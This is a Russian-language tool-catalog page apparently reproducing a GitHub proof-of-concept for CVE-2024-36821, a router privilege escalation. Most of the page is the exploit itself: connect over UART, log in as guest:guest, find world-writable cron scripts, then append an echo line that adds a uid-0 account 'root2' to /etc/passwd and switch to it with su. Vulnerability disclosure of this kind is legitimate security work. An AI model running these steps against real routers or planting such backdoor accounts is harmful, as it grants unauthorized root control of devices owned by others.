Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36821 — Публичная ссылка, содержащая минимально необходимую информацию об уязвимости, охватываемой CVE-2024-36821. | Kitploit
Инструменты/GitHubGitHub/ivanglinkin/cve-2024-36821
Безопасность встроенных системПовышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность оборудования и IoT
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

Публичная ссылка, содержащая минимально необходимую информацию об уязвимости, охватываемой CVE-2024-36821.

Репозиторий
32 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36821

Публичная ссылка, содержащая минимально необходимую информацию об уязвимости CVE-2024-36821

Оригинальное видео с PoC вы можете найти по ссылке -> https://www.youtube.com/watch?v=6vHno0ik7JY

PoC:

  1. Подключитесь к маршрутизатору через UART-соединение

  2. Используя учётные данные guest:guest, войдите в систему

  3. Используя команду find / -perm -777 -type f 2>/dev/null, найдите файлы с правами на чтение, запись и выполнение:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 at 20 00 50
  4. Проверьте владельца командой ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. Сгенерируйте пароль командой openssl passwd Abracadabra

  6. Отредактируйте /tmp/cron/cron.everyminute/conntrack_collector.sh, добавив в конец новый сгенерированный пароль:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 at 20 05 05
  7. Подождите минуту

  8. Переключитесь на пользователя root2 следующей командой

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
Скачать инструмент